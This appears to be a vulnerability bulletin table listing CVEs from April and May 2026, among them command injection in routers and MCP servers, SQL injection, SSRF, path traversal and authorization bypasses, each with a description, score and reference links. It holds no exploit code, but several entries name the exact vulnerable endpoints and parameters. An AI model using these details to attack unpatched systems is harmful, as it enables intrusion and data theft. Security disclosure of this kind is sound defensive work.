| n/a--JeecgBoot | A security flaw has been discovered in JeecgBoot up to 3.9.1. This vulnerability affects the function CommonController.uploadImgByHttp/HttpFileToMultipartFileUtil.httpFileToMultipartFile/HttpFileToMultipartFileUtil.downloadImageData of the file CommonController.java of the component uploadImgByHttpEndpoint. Performing a manipulation results in server-side request forgery. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. Upgrading the affected component is recommended. The vendor confirmed the issue and will provide a fix in the upcoming release. | 2026-05-02 | 6.3 | CVE-2026-7605 | VDB-360562 \| JeecgBoot uploadImgByHttpEndpoint CommonController.java HttpFileToMultipartFileUtil.downloadImageData server-side request forgery VDB-360562 \| CTI Indicators (IOB, IOC, IOA) Submit #805709 \| jeecgboot JeecgBoot <= v3.9.1 SSRF https://github.com/jeecgboot/JeecgBoot/issues/9555 https://github.com/jeecgboot/JeecgBoot/issues/9555#issuecomment-4251745271 https://github.com/jeecgboot/JeecgBoot/ |
| TRENDnet--TEW-821DAP | A flaw has been found in TRENDnet TEW-821DAP up to 1.12B01. The impacted element is the function tools_diagnostic of the file /tmp/diagnostic of the component Firmware Update. This manipulation causes os command injection. Remote exploitation of the attack is possible. The exploit has been published and may be used. The vendor explains: "That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling". This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-02 | 6.3 | CVE-2026-7609 | VDB-360566 \| TRENDnet TEW-821DAP Firmware Update diagnostic tools_diagnostic os command injection VDB-360566 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #806216 \| Trendnet TEW-821DAP v1.12B01 CWE-78 Improper Neutralization of Special Elements used in an O https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_CI2.md |
| 8nite--metatrader-4-mcp | A security vulnerability has been detected in 8nite metatrader-4-mcp 1.0.0. This vulnerability affects the function CallToolRequestSchema of the file src/index.ts of the component sync_ea_from_file. Such manipulation of the argument ea_name leads to path traversal. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 6.3 | CVE-2026-7627 | VDB-360573 \| 8nite metatrader-4-mcp sync_ea_from_file index.ts CallToolRequestSchema path traversal VDB-360573 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #806286 \| 8nite metatrader-4-mcp 1.0.0 Path Traversal https://github.com/8nite/metatrader-4-mcp/issues/1 https://github.com/8nite/metatrader-4-mcp/ |
| crazyrabbitLTC--mcp-code-review-server | A vulnerability was detected in crazyrabbitLTC mcp-code-review-server up to 0.1.0. This issue affects the function executeRepomix of the file src/repomix.ts of the component RepoMix Command Handler. Performing a manipulation results in command injection. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-02 | 6.3 | CVE-2026-7628 | VDB-360574 \| crazyrabbitLTC mcp-code-review-server RepoMix repomix.ts executeRepomix command injection VDB-360574 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #806469 \| crazyrabbitLTC mcp-code-review-server <=0.1.0 Command Injection https://github.com/crazyrabbitLTC/mcp-code-review-server/issues/4 https://github.com/crazyrabbitLTC/mcp-code-review-server/pull/5 https://github.com/user-attachments/files/26018245/mcp-code-review-server_bug.pdf https://github.com/crazyrabbitLTC/mcp-code-review-server/ |
| kleneway--awesome-cursor-mpc-server | A flaw has been found in kleneway awesome-cursor-mpc-server up to 2.0.1. Impacted is the function runCodeReviewTool of the file src/tools/codeReview.ts of the component Code-Review Tool. Executing a manipulation can lead to command injection. The attack may be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-02 | 6.3 | CVE-2026-7629 | VDB-360575 \| kleneway awesome-cursor-mpc-server Code-Review Tool codeReview.ts runCodeReviewTool command injection VDB-360575 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #806470 \| kleneway awesome-cursor-mpc-server <=2.0.1 Command Injection https://github.com/kleneway/awesome-cursor-mpc-server/issues/6 https://github.com/kleneway/awesome-cursor-mpc-server/pull/14 https://github.com/user-attachments/files/26019723/awesome-cursor-mpc-server_bug.pdf https://github.com/kleneway/awesome-cursor-mpc-server/ |
| Totolink--N300RH | A vulnerability was identified in Totolink N300RH 6.1c.1353_B20190305. This impacts the function setUploadSetting of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument FileName leads to file inclusion. The attack may be performed from remote. The exploit is publicly available and might be used. | 2026-05-02 | 6.5 | CVE-2026-7633 | VDB-360579 \| Totolink N300RH cstecgi.cgi setUploadSetting file inclusion VDB-360579 \| CTI Indicators (IOB, IOC, IOA) Submit #806597 \| TOTOLINK N300RH_V4 V6.1c.1353_B20190305 External Control of System or Configuration Setting https://github.com/xyh4ck/iot_poc/tree/main/TOTOLINK/N300RHv4/03_setUploadSetting_ECFNP https://www.totolink.net/ |
| pskill9--website-downloader | A vulnerability was detected in pskill9 website-downloader up to 0.1.0. This affects the function download_website of the file src/index.ts of the component MCP Interface. Performing a manipulation of the argument outputPath results in os command injection. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 6.3 | CVE-2026-7642 | VDB-360754 \| pskill9 website-downloader MCP index.ts download_website os command injection VDB-360754 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #806812 \| pskill9 website-downloader Commit 5b399bebad1800ac6df5052b63eaea37117092b6 Command Injection https://github.com/pskill9/website-downloader/issues/7 https://github.com/BruceJqs/public_exp/issues/31 https://github.com/pskill9/website-downloader/ |
| ruvnet--sublinear-time-solver | A vulnerability was found in ruvnet sublinear-time-solver 1.5.0. Affected by this vulnerability is the function export_state of the file src/consciousness-explorer/mcp/server.js of the component MCP Interface. The manipulation results in path traversal. The attack can be executed remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 6.5 | CVE-2026-7645 | VDB-360757 \| ruvnet sublinear-time-solver MCP server.js export_state path traversal VDB-360757 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #806895 \| ruvnet sublinear-time-solver / consciousness-explorer sublinear-time-solver 1.5.0, consciousness-explorer 1.1.1, commit 1210646955f33abe5c91f894cc7b04d024f62408 Path Traversal https://github.com/ruvnet/sublinear-time-solver/issues/19 https://github.com/ruvnet/sublinear-time-solver/ |
| r-huijts--mcp-server-rijksmuseum | A security flaw has been discovered in r-huijts mcp-server-rijksmuseum up to 1.0.4. Affected is the function open_image_in_browser of the file src/index.ts of the component MCP Interface. Performing a manipulation of the argument imageUrl results in os command injection. The attack can be carried out remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 6.3 | CVE-2026-7653 | VDB-360778 \| r-huijts mcp-server-rijksmuseum MCP index.ts open_image_in_browser os command injection VDB-360778 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #806909 \| r-huijts mcp-server-rijksmuseum 1.0.4 Command Injection https://github.com/r-huijts/rijksmuseum-mcp/issues/9 |
| youlaitech--youlai-boot | A security vulnerability has been detected in youlaitech youlai-boot up to 2.21.1. This affects the function getUserList of the file src/main/java/com/youlai/boot/system/controller/UserController.java of the component Users Endpoint. Such manipulation of the argument order leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7672 | VDB-360825 \| youlaitech youlai-boot Users Endpoint UserController.java getUserList sql injection VDB-360825 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #800658 \| youlaitech youlai-boot v2.21.1 SQL Injection https://fx4tqqfvdw4.feishu.cn/docx/EBZLdUqt4ogm4Px7jxuck1RQnHe?from=from_copylink |
| YunaiV--yudao-cloud | A vulnerability was identified in YunaiV yudao-cloud up to 2026.01. This affects the function getDataBySQL of the file yudao-module-report-biz/src/main/java/io/github/ruoyi/report/service/impl/GoViewDataServiceImpl.java. Such manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7678 | VDB-360831 \| YunaiV yudao-cloud GoViewDataServiceImpl.java getDataBySQL sql injection VDB-360831 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #800865 \| YunaiV yudao-cloud yudao-cloud up to 2026.01 SQL Injection https://github.com/9str0IL/CVE/issues/2 |
| jsbroks--COCO Annotator | A security vulnerability has been detected in jsbroks COCO Annotator up to 0.11.1. Affected by this vulnerability is an unknown functionality of the file backend/webserver/api/datasets.py of the component Dataset API. The manipulation of the argument DatasetId leads to authorization bypass. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.5 | CVE-2026-7681 | VDB-360834 \| jsbroks COCO Annotator Dataset API datasets.py authorization VDB-360834 \| CTI Indicators (IOB, IOC, IOA) Submit #801408 \| jsbroks COCO Annotator 0.11.1 Authorization Bypass https://github.com/natanmorette-thoropass/thoropass-vuln-research-program/tree/main/2026/Unauthenticated%20Dataset%20Modification%20via%20Missing%20Authentication |
| Edimax--BR-6208AC | A security flaw has been discovered in Edimax BR-6208AC 1.02. The impacted element is the function setWAN of the file /goform/setWAN of the component L2TP Mode. The manipulation of the argument L2TPUserName results in command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7682 | VDB-360841 \| Edimax BR-6208AC L2TP Mode setWAN command injection VDB-360841 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #801572 \| Edimax BR-6208AC V2_1.02 Command Injection https://tzh00203.notion.site/Edimax-BR-6208AC-V2-1-02-setWAN-L2TPUserName-Command-Injection-33db5c52018a80c1b3aac6db8927bd0f |
| Edimax--BR-6428nC | A weakness has been identified in Edimax BR-6428nC up to 1.16. This affects an unknown function of the file /goform/setWAN of the component Web Interface. This manipulation of the argument pppUserName/pptpUserName causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7683 | VDB-360842 \| Edimax BR-6428nC Web setWAN command injection VDB-360842 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #801597 \| Edimax BR-6428nC v1.16 v1.16 Command Injection Submit #801598 \| Edimax BR-6428nC v1.16 v1.16 Command Injection (Duplicate) https://tzh00203.notion.site/Edimax-BR-6428nC-v1-16-setWAN-pppUserName-Command-Injection-33db5c52018a80dab299ef508e810d00 https://tzh00203.notion.site/Edimax-BR-6428nC-v1-16-setWAN-pptpUserName-Command-Injection-33db5c52018a80949cfbcc2091340c80 |
| langflow-ai--langflow | A vulnerability was determined in langflow-ai langflow up to 1.8.4. Affected by this issue is the function CodeParser.parse_callable_details of the file src/lfx/src/lfx/custom/code_parser/code_parser.py of the component Full Builtins Module Handler. Executing a manipulation can lead to command injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7687 | VDB-360857 \| langflow-ai langflow Full Builtins code_parser.py CodeParser.parse_callable_details command injection VDB-360857 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #798731 \| langflow-ai langflow 1.8.4 Command Injection https://www.yuque.com/yuqueyonghuqy8yu4/ghuay4/ylrgoyyfrucp8opo?singleDoc=#g4kyb |
| Wavlink--WL-WN570HA1 | A weakness has been identified in Wavlink WL-WN570HA1 R70HA1 V1410_221110. This issue affects the function set_sys_adm of the file /cgi-bin/adm.cgi. This manipulation of the argument Username causes command injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. Once again the vendor acted very professionally and confirmed "that the WN570HA1 firmware version R70HA1 V1410_221110 has been removed from our website." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-03 | 6.3 | CVE-2026-7690 | VDB-360860 \| Wavlink WL-WN570HA1 adm.cgi set_sys_adm command injection VDB-360860 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #807805 \| Wavlink WN570HA1 WL-WN570HA1 221110 Command Injection https://lavender-bicycle-a5a.notion.site/Wavlink-WN570HA1-set_sys_adm-34753a41781f809d8043f0a7a3e07e50?source=copy_link |
| Wavlink--WL-WN570HA1 | A security vulnerability has been detected in Wavlink WL-WN570HA1 R70HA1 V1410_221110. Impacted is the function set_sys_cmd of the file /cgi-bin/adm.cgi. Such manipulation of the argument command leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. Once again the vendor acted very professionally and confirmed "that the WN570HA1 firmware version R70HA1 V1410_221110 has been removed from our website." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-03 | 6.3 | CVE-2026-7691 | VDB-360861 \| Wavlink WL-WN570HA1 adm.cgi set_sys_cmd command injection VDB-360861 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #807806 \| Wavlink WN570HA1 WL-WN570HA1 221110 Command Injection https://lavender-bicycle-a5a.notion.site/Wavlink-WN570HA1-set_sys_cmd-34753a41781f80ab88a1d95d4f798d1f?source=copy_link |
| Wavlink--WL-WN570HA1 | A vulnerability was detected in Wavlink WL-WN570HA1 R70HA1 V1410_221110. The affected element is the function ping_ddns of the file /cgi-bin/adm.cgi. Performing a manipulation of the argument DDNS results in command injection. The attack can be initiated remotely. The exploit is now public and may be used. Once again the vendor acted very professionally and confirmed "that the WN570HA1 firmware version R70HA1 V1410_221110 has been removed from our website." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-03 | 6.3 | CVE-2026-7692 | VDB-360862 \| Wavlink WL-WN570HA1 adm.cgi ping_ddns command injection VDB-360862 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #807807 \| Wavlink WN570HA1 WL-WN570HA1 221110 Command Injection https://lavender-bicycle-a5a.notion.site/Wavlink-WN570HA1-ping_ddns-34753a41781f80c0a6c6c1b09b7cdf1c?source=copy_link |
| Acrel Electrical--EEMS Enterprise Power Operation and Maintenance Cloud Platform | A vulnerability was found in Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform 1.3.0. This impacts an unknown function of the file /SubstationWEBV2/main/uploadH5Files. The manipulation of the argument File results in unrestricted upload. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7696 | VDB-360865 \| Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform uploadH5Files unrestricted upload VDB-360865 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #807944 \| Acrel Electric Co., Ltd. EEMS Enterprise Power Operation and Maintenance Cloud Platform 1.3.0 Unrestricted Upload of File with Dangerous Type https://ucn9h68n9289.feishu.cn/wiki/X9PAw4i5kiPueKkZqCCcNVYZnnc?from=from_copylink |
| Dromara--MaxKey | A security flaw has been discovered in Dromara MaxKey up to 3.5.13. Affected by this issue is the function StrUtils.checkSqlInjection of the file StrUtils.java. Performing a manipulation of the argument filtersfields results in sql injection. The attack can be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7699 | VDB-360868 \| Dromara MaxKey StrUtils.java StrUtils.checkSqlInjection sql injection VDB-360868 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #804260 \| Dromara MaxKey 3.5.13 SQL Injection https://github.com/xpp3901/CVE_APPLY/tree/main/V-M001_MaxKey_Filters_SQL_Injection |
| langflow-ai--langflow | A weakness has been identified in langflow-ai langflow up to 1.8.4. This affects the function eval of the file src/lfx/src/lfx/components/llm_operations/lambda_filter.p of the component LambdaFilterComponent. Executing a manipulation can lead to code injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7700 | VDB-360869 \| langflow-ai langflow LambdaFilterComponent lambda_filter.p eval code injection VDB-360869 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #804305 \| langflow-ai Langflow Desktop 1.8.3 Execution with Unnecessary Privileges https://www.yuque.com/mengnanbulalei/ognlsk/hte2a98ro5gf8tp9?singleDoc#%20%E3%80%8AFirst%20release%20of%20Langflow%201.8.3%20Smart%20Transform%20eval()/Lambda%20injection%20RCE%20vulnerability%20analysis+POC%E3%80%8B |
| JD Cloud--JDCOS | A flaw has been found in JD Cloud JDCOS 4.5.1.r4518. This vulnerability affects the function set_iptv_info of the file /jdcap of the component Service Interface. Executing a manipulation of the argument vid can lead to command injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7705 | VDB-360881 \| JD Cloud JDCOS Service jdcap set_iptv_info command injection VDB-360881 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #805644 \| jdcloud JD Cloud Wireless Bao ER1 Taiyi wired gigabit router JDCOS-JDC08-4.5.1.r4518 Remote code execution https://www.notion.so/3430c75766a8802dbde3dc8a372c7f46 |
| janeczku--Calibre-Web | A vulnerability was identified in janeczku Calibre-Web up to 0.6.26. The impacted element is the function generate_auth_token of the file cps/kobo_auth.py of the component Endpoint. Such manipulation of the argument user_id leads to improper authorization. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7709 | VDB-360885 \| janeczku Calibre-Web Endpoint kobo_auth.py generate_auth_token improper authorization VDB-360885 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #805823 \| Janeczku Calibre-web V0.6.7-V0.6.26 IDOR in auth-token generation leading to account takeover / user https://drive.google.com/drive/folders/1rosrcfxcHrQM7_GOiBwzY_GnCfXoFuVR?usp=drive_link |
| n/a--MindsDB | A security vulnerability has been detected in MindsDB up to 26.01. Affected is the function pickle.loads of the component Pickle Handler. The manipulation leads to deserialization. The attack can be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 6.3 | CVE-2026-7712 | VDB-360888 \| MindsDB Pickle pickle.loads deserialization VDB-360888 \| CTI Indicators (IOB, IOC, IOA) Submit #806827 \| https://github.com/mindsdb/mindsdb <=26.01 Remote Code Execution https://github.com/nn0nkey/JD-Security-SHENYI-Team/blob/main/MindsDB_Pickle_RCE.md |
| Merge--Merge PACS | Merge PACS 7.0 contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized actions by crafting malicious HTML forms targeting the merge-viewer endpoint. Attackers can submit POST requests to /servlet/actions/merge-viewer/summary with login credentials to hijack user sessions and gain unauthorized access to the PACS system. | 2026-04-29 | 5.3 | CVE-2018-25298 | ExploitDB-44681 Official Product Homepage VulnCheck Advisory: Merge PACS 7.0 Cross-Site Request Forgery via merge-viewer |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.3 for Linux, UNIX and Windows (includes Db2 Connect Server) could allow an authenticated user to cause a denial of service due to improper neutralization of special elements in data query logic when certain configurations exist. | 2026-04-30 | 5.3 | CVE-2025-14688 | https://www.ibm.com/support/pages/node/7269424 |
| IBM--watsonx.data | IBM watsonx.data 2.2 through 2.3 IBM Lakehouse does not properly restrict communication between pods which could allow an attacker to transfer data between pods without restrictions. | 2026-04-30 | 5.3 | CVE-2025-36180 | https://www.ibm.com/support/pages/node/7270593 |
| Dell--Alienware Command Center (AWCC) | Dell Alienware Command Center (AWCC), versions prior to 6.13.8.0, contain a Least Privilege Violation vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of Privileges. | 2026-04-27 | 5.3 | CVE-2026-32655 | https://www.dell.com/support/kbdoc/en-us/000451018/dsa-2026-192-security-update-for-dell-alienware-command-center-6-x-for-multiple-vulnerabilities |
| Elastic--Elastic Package Registry | Improper Verification of Cryptographic Signature (CWE-347) in Elastic Package Registry could allow an attacker positioned to intercept network traffic, or to otherwise influence the contents served to a self-hosted registry, to substitute a tampered package without the integrity check failing closed. | 2026-04-28 | 5.9 | CVE-2026-33467 | https://discuss.elastic.co/t/elastic-package-registry-1-38-0-security-update-esa-2026-27/386081 |
| dokaninc--Dokan: AI Powered WooCommerce Multivendor Marketplace Solution Build Your Own Amazon, eBay, Etsy | The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.1 via the '/dokan/v1/stores/{id}/reviews' REST API endpoint. This is due to the 'prepare_reviews_for_response' method including reviewer email addresses, usernames, and user IDs in the API response. This makes it possible for unauthenticated attackers to extract email addresses, usernames, and user IDs of all customers who left reviews on any vendor's store. The Pro version of the plugin must be installed and activated, with store reviews enabled, in order to exploit the vulnerability. | 2026-05-02 | 5.3 | CVE-2026-3504 | https://www.wordfence.com/threat-intel/vulnerabilities/id/02b0d7d7-8a10-48de-b1e1-7e1f1fda6ffe?source=cve https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreController.php#L125 https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreController.php#L835 https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreController.php#L854 https://plugins.trac.wordpress.org/changeset/3481799/ |
| n/a-- V2Board v1.7.4 | Sensitive server_token exposed via GET parameter in V2Board thru 1.7.4. In app/Http/Controllers/Server/UniProxyController.php, the server authentication token is accepted via GET parameter transmission. The token appears in URLs such as /api/v1/server/UniProxy/user?token=SECRET, causing it to be recorded in web server access logs, browser history, HTTP Referer headers, and proxy/CDN logs. An attacker who gains access to any log source can extract the token and impersonate a proxy server node, potentially intercepting all user traffic. | 2026-05-01 | 5.3 | CVE-2026-37504 | https://github.com/v2board/v2board https://gist.github.com/sgInnora/1330e1a82caa79906eec55eeff2c99b9 |
| complianz--Complianz GDPR/CCPA Cookie Consent | The Complianz - GDPR/CCPA Cookie Consent plugin for WordPress is vulnerable to unauthorized data access in all versions up to, and including, 7.4.5. This is due to the REST API endpoint at /wp-json/complianz/v1/consent-area/{post_id}/{block_id} using __return_true as the permission_callback, allowing any unauthenticated user to access it. The cmplz_rest_consented_content() function retrieves a post by ID via get_post() and returns the consentedContent attribute of any complianz/consent-area block found in it, without checking if the post is published or if the user has permission to read it. This makes it possible for unauthenticated attackers to read the consent area block content from private, draft, or unpublished posts. | 2026-04-29 | 5.3 | CVE-2026-4019 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3892489e-6ff7-4664-bb06-b8edff6dd659?source=cve https://github.com/complianz/complianz-gdpr/blob/64c09657bd028f62d7b50a54d83ca19b87df2cef/rest-api/rest-api.php#L61 https://plugins.trac.wordpress.org/browser/complianz-gdpr/tags/7.4.4.2/rest-api/rest-api.php#L54 https://plugins.trac.wordpress.org/browser/complianz-gdpr/tags/7.4.4.2/rest-api/rest-api.php#L61 https://plugins.trac.wordpress.org/changeset/3508713/complianz-gdpr/trunk/rest-api/rest-api.php https://plugins.trac.wordpress.org/changeset?old_path=%2Fcomplianz-gdpr/tags/7.4.5&new_path=%2Fcomplianz-gdpr/tags/7.4.6 |
| diplodoc-platform--@diplodoc/search-extension | @diplodoc/search-extension 1.0.0 through 3.x before 3.0.3 allows stored XSS via the title in a .md file. | 2026-05-01 | 5.4 | CVE-2026-40201 | https://github.com/diplodoc-platform/search-extension/releases https://github.com/diplodoc-platform/search-extension/pull/41 https://github.com/diplodoc-platform/search-extension/releases/tag/v3.0.3 https://github.com/eyelessgoddd/eyelessgoddd/blob/main/README.md |
| wproyal--Royal Addons for Elementor Addons and Templates Kit for Elementor | The Royal Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `wpr_update_form_action_meta` AJAX action in all versions up to, and including, 1.7.1056. The handler is registered on both `wp_ajax` and `wp_ajax_nopriv` hooks, making it accessible to unauthenticated users. Although a nonce is verified, the nonce (`wpr-addons-js`) is publicly exposed in frontend JavaScript via `WprConfig.nonce` on any page that loads Royal Addons widgets, rendering the protection ineffective. The endpoint also lacks any capability or ownership checks and directly calls `update_post_meta()` with user-controlled input on a whitelisted set of form action meta keys. This makes it possible for unauthenticated attackers to modify form action configuration metadata (email, submissions, Mailchimp, and webhook settings) on any post, potentially leading to webhook/email action tampering and data exfiltration via modified webhook URLs. | 2026-05-02 | 5.3 | CVE-2026-4024 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2ecec7d7-d1b2-4ccf-ade6-1f78224968c6?source=cve https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php#L21 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1049/classes/modules/forms/wpr-actions-status.php#L21 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php#L73 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1049/classes/modules/forms/wpr-actions-status.php#L73 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/plugin.php#L592 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1049/plugin.php#L592 |
| MIT--Kerberos 5 | In MIT Kerberos 5 (aka krb5) before 1.22.3, there is a NULL pointer dereference if an application calls gss_accept_sec_context() on a system with a NegoEx mechanism registered in /etc/gss/mech. An unauthenticated remote attacker can trigger this, causing the process to terminate in parse_nego_message. | 2026-04-28 | 5.9 | CVE-2026-40355 | https://web.mit.edu/kerberos/advisories/ https://cems.fun/2026/04/27/krb5-two-unauthenticated-network-vulnerabilities.html https://github.com/krb5/krb5/commit/2e75f0d9362fb979f5fc92829431a590a130929f |
| MIT--Kerberos 5 | In MIT Kerberos 5 (aka krb5) before 1.22.3, there is an integer underflow and resultant out-of-bounds read if an application calls gss_accept_sec_context() on a system with a NegoEx mechanism registered in /etc/gss/mech. An unauthenticated remote attacker can trigger this, possibly causing the process to terminate in parse_message. | 2026-04-28 | 5.9 | CVE-2026-40356 | https://web.mit.edu/kerberos/advisories/ https://cems.fun/2026/04/27/krb5-two-unauthenticated-network-vulnerabilities.html https://github.com/krb5/krb5/commit/2e75f0d9362fb979f5fc92829431a590a130929f |
| SmarterTools Inc.--SmarterMail | SmarterTools SmarterMail builds prior to 9610 contain a cryptographic weakness in the file and email sharing endpoints that use DES-CBC encryption with keys and initialization vectors derived from System.Random seeded with insufficient entropy, reducing the seed space to approximately 19,000 possible values. An unauthenticated attacker can use the attachment download endpoint as an oracle to determine the seed in use and derive encryption keys and initialization vectors to forge sharing tokens for arbitrary emails, attachments, or file storage contents without prior access to the targeted content. | 2026-04-27 | 5.9 | CVE-2026-40514 | https://www.smartertools.com/smartermail/release-notes/current https://www.vulncheck.com/advisories/smartertools-smartermail-build-9610-cryptographic-weakness-via-weak-rng |
| Exim--Exim | In Exim before 4.99.2, on systems using musl libc (not glibc), an attacker can crash the connection instance when malformed DNS data is present in PTR records. This is caused by a dn_expand oddity in octal printing. | 2026-04-30 | 5.9 | CVE-2026-40684 | https://www.openwall.com/lists/oss-security/2026/04/30/21 https://exim.org/static/doc/security/cve-2026-04.1/CVE2026-40684.assessment https://code.exim.org/exim/exim/commit/628bbaca7672748d941a12e7cd5f0122a4e18c81 https://exim.org/static/doc/security/CVE-2026-40684.txt |
| TRENDnet--TEW-821DAP | A vulnerability was detected in TRENDnet TEW-821DAP up to 1.12B01. The affected element is the function tools_diagnostic. The manipulation results in os command injection. The exploit is now public and may be used. The vendor explains: "That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling". This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-02 | 5.5 | CVE-2026-7608 | VDB-360565 | TRENDnet TEW-821DAP tools_diagnostic os command injection VDB-360565 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806215 | Trendnet TEW-821DAP v1.12B01 CWE-78 Improper Neutralization of Special Elements used in an OS https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_CI1.md |
| code-projects--Online Hospital Management System | A vulnerability was found in code-projects Online Hospital Management System 1.0. The impacted element is an unknown function of the component Registration Handler. The manipulation of the argument Username results in improper authorization. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-05-02 | 5.4 | CVE-2026-7631 | VDB-360577 | code-projects Online Hospital Management System Registration improper authorization VDB-360577 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806565 | Code-projects Online Hospital Management System V1.0 unauthorized access https://github.com/MyMySSS/CVE123/blob/main/cve2/cve2.md https://code-projects.org/ |
| appcheap--App Builder Create Native Android & iOS Apps On The Flight | The App Builder - Create Native Android & iOS Apps On The Flight plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to and including 5.6.0. This is due to missing authorization validation in the `upload_avatar()` function, which accepts an attacker-controlled `user_id` parameter from the POST request body and uses it to update user meta without verifying that the authenticated requester owns or has permission to modify the target account. This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the profile avatar of any arbitrary user on the site, including administrators, by supplying a target `user_id` in the request body to the `/wp-json/app-builder/v1/upload-avatar` endpoint. | 2026-05-02 | 5.3 | CVE-2026-7638 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2d532ffc-c6f1-41e3-9a59-0706802ab8e2?source=cve https://plugins.trac.wordpress.org/browser/app-builder/trunk/includes/Di/Service/Auth/UploadAvatar.php#L80 https://plugins.trac.wordpress.org/browser/app-builder/tags/5.6.0/includes/Di/Service/Auth/UploadAvatar.php#L80 https://plugins.trac.wordpress.org/browser/app-builder/trunk/includes/Di/Service/Auth/UploadAvatar.php#L161 